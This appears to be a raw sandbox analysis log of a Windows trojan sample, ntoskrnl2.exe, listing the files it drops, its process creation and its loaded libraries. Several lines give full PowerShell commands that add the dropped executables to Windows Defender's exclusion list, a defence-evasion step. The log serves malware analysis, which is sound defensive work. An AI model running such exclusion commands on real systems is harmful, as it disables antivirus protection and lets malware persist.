                    Source: Joe Sandbox ViewDropped File: C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exe 6EBED9F6DE82360A3724C5148EAACED3273CE3E48826492D87DA9D7E978EB6FC
                    Source: Joe Sandbox ViewDropped File: C:\Recovery\GFIYCbjKVID.exe 6EBED9F6DE82360A3724C5148EAACED3273CE3E48826492D87DA9D7E978EB6FC
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\NewzHbtF.log 2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                    Source: clfwIsGE.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: fscFeKAz.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: NgAzKpfk.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: NewzHbtF.log.37.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: olnMZMXE.log.37.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: dxIWpAcW.log.37.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: ntoskrnl2.exe, 00000000.00000002.2129366309.000000001BD9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs ntoskrnl2.exe
                    Source: ntoskrnl2.exe, 00000000.00000000.2010478392.00000000004F4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs ntoskrnl2.exe
                    Source: ntoskrnl2.exeBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs ntoskrnl2.exe
                    Source: ntoskrnl2.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: ntoskrnl2.exeStatic PE information: Section: .reloc ZLIB complexity 1.017578125
                    Source: GFIYCbjKVID.exe.0.drStatic PE information: Section: .reloc ZLIB complexity 1.017578125
                    Source: GFIYCbjKVID.exe0.0.drStatic PE information: Section: .reloc ZLIB complexity 1.017578125
                    Source: GFIYCbjKVID.exe1.0.drStatic PE information: Section: .reloc ZLIB complexity 1.017578125
                    Source: GFIYCbjKVID.exe2.0.drStatic PE information: Section: .reloc ZLIB complexity 1.017578125
                    Source: GFIYCbjKVID.exe3.0.drStatic PE information: Section: .reloc ZLIB complexity 1.017578125
                    Source: classification engineClassification label: mal100.troj.evad.winEXE@33/52@1/1
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeFile created: C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exeJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeFile created: C:\Users\user\Desktop\clfwIsGE.logJump to behavior
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exeMutant created: NULL
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DkfDkSKDFkSDFKFDSgdfgk
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7360:120:WilError_03
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeFile created: C:\Users\user\AppData\Local\Temp\foSHXkVyDmJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\09VUCC0aBk.bat"
                    Source: ntoskrnl2.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: ntoskrnl2.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: ntoskrnl2.exeVirustotal: Detection: 76%
                    Source: ntoskrnl2.exeReversingLabs: Detection: 76%
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeFile read: C:\Users\user\Desktop\ntoskrnl2.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\ntoskrnl2.exe "C:\Users\user\Desktop\ntoskrnl2.exe"
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exe'
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\GFIYCbjKVID.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\PLA\Templates\GFIYCbjKVID.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Migration\WTR\GFIYCbjKVID.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Containers\GFIYCbjKVID.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ntoskrnl2.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\09VUCC0aBk.bat"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Windows\Containers\GFIYCbjKVID.exe C:\Windows\Containers\GFIYCbjKVID.exe
                    Source: unknownProcess created: C:\Windows\Containers\GFIYCbjKVID.exe C:\Windows\Containers\GFIYCbjKVID.exe
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                    Source: unknownProcess created: C:\Users\user\Desktop\ntoskrnl2.exe C:\Users\user\Desktop\ntoskrnl2.exe
                    Source: unknownProcess created: C:\Users\user\Desktop\ntoskrnl2.exe C:\Users\user\Desktop\ntoskrnl2.exe
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exe "C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exe"
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\GFIYCbjKVID.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\PLA\Templates\GFIYCbjKVID.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Migration\WTR\GFIYCbjKVID.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Containers\GFIYCbjKVID.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ntoskrnl2.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\09VUCC0aBk.bat" Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exe "C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exe"
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: ktmw32.dllJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: dlnashext.dllJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: wpdshext.dllJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
